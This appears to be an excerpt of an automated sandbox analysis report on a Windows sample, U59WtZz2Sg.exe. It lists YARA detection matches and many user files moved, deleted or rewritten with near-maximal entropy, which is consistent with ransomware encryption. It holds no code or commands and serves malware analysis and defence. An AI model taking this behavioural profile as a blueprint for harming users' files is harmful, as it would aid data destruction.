Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 5228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 3692, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 1272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 3184, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File moved: C:\Users\user\Desktop\BPMLNOBVSB.jpg
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File deleted: C:\Users\user\Desktop\BPMLNOBVSB.jpg
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File moved: C:\Users\user\Desktop\WUTJSCBCFX\WUTJSCBCFX.docx
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File deleted: C:\Users\user\Desktop\WUTJSCBCFX\WUTJSCBCFX.docx
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File moved: C:\Users\user\Desktop\KZWFNRXYKI\QNCYCDFIJJ.mp3
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 entropy: 7.99718399296
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 entropy: 7.99869096623
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001 entropy: 7.99861836034
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133051620838562510.txt entropy: 7.99842047333
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\plugins.qmltypes entropy: 7.9976440774
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133051620921860467.txt entropy: 7.9983292679
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701119838854.txt entropy: 7.99818298483
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701138403912.txt entropy: 7.99822942189
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701505080737.txt entropy: 7.99843483481
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\images\flapper.gif entropy: 7.99709477717
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Extras\plugins.qmltypes entropy: 7.99393413696
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Templates.2\plugins.qmltypes entropy: 7.99754052711
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt entropy: 7.99584745995
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt entropy: 7.99855840227
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt entropy: 7.99463027142
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt entropy: 7.99489474793
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99188039174
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt entropy: 7.99835419598
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt entropy: 7.99865927987
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt entropy: 7.996764672
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt entropy: 7.99817114966
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt entropy: 7.99155169116
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt entropy: 7.99862793305
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt entropy: 7.99564862987
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt entropy: 7.99365886765
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\{5BAAF43C-032B-11EB-90E4-ECF4BB570DC9}.dat entropy: 7.9912230943
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt entropy: 7.99662861073
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui entropy: 7.99409784357
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt entropy: 7.99636084684
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt entropy: 7.99443921081
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt entropy: 7.99121582669
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js entropy: 7.99751740013
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\WimProvider.dll.mui entropy: 7.9923616287
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\de\OneDrive.adml entropy: 7.99556620242
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\es\OneDrive.adml entropy: 7.99597410146
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\fr\OneDrive.adml entropy: 7.99599838665
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\hu\OneDrive.adml entropy: 7.99603839271
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\it\OneDrive.adml entropy: 7.99575239825
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ja\OneDrive.adml entropy: 7.99595138657
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ko\OneDrive.adml entropy: 7.99574027367
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\nl\OneDrive.adml entropy: 7.9952345599
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg entropy: 7.99746001356
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pl\OneDrive.adml entropy: 7.99597646639
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pt-BR\OneDrive.adml entropy: 7.99602810998
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pt-PT\OneDrive.adml entropy: 7.9950605594
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ru\OneDrive.adml entropy: 7.99692983487
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico entropy: 7.99871963214
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\sv\OneDrive.adml entropy: 7.99524754113
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\tr\OneDrive.adml entropy: 7.99606012022
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\zh-CN\OneDrive.adml entropy: 7.99481256171
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\zh-TW\OneDrive.adml entropy: 7.99425827432
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\acm_low_disk_space_online_only.svg entropy: 7.99630390885
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat entropy: 7.99055795118
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\OneDrive.adml entropy: 7.99471432634
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\am-ET\FileSync.LocalizedResources.dll.mui entropy: 7.99881519691
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin entropy: 7.99442966622
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\finderExtensionPrompt.svg entropy: 7.99584080057
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-US\msipc.dll.mui entropy: 7.9958653689
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\he\FileSync.LocalizedResources.dll.mui entropy: 7.99649881628
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ig-NG\FileSync.LocalizedResources.dll.mui entropy: 7.99856775073
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ThirdPartyNotices.txt entropy: 7.99590032893
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ja\FileSync.LocalizedResources.dll.mui entropy: 7.99851888267
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ko\FileSync.LocalizedResources.dll.mui entropy: 7.99852776609
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ku-Arab\FileSync.LocalizedResources.dll.mui entropy: 7.99383215582
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db entropy: 7.99840183987
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db entropy: 7.99843170661
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db entropy: 7.99821329563
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db entropy: 7.99831618931
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99833774153
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\GA0XG3F1\www.bing[1].xml entropy: 7.99875962587
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif entropy: 7.99721934119
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png entropy: 7.99094671707
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png entropy: 7.99396331293
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\kfm_folders_image.svg entropy: 7.99211560075
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\acm_low_disk_space_online_only.svg entropy: 7.99605241269
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\done_graphic.svg entropy: 7.99025058473
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\finderExtensionPrompt.svg entropy: 7.99526710076
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\folder_image_documents.svg entropy: 7.99192159907
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\0.0.filtertrie.intermediate.txt entropy: 7.99183641623
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\Apps.ft entropy: 7.99281406479
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\Apps.index entropy: 7.99876519634
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\0.0.filtertrie.intermediate.txt entropy: 7.99103949604
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\Apps.ft entropy: 7.99273703708
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\Apps.index entropy: 7.99871144675
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nso-ZA\FileSync.LocalizedResources.dll.mui entropy: 7.99029743124
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\0.0.filtertrie.intermediate.txt entropy: 7.99014171777
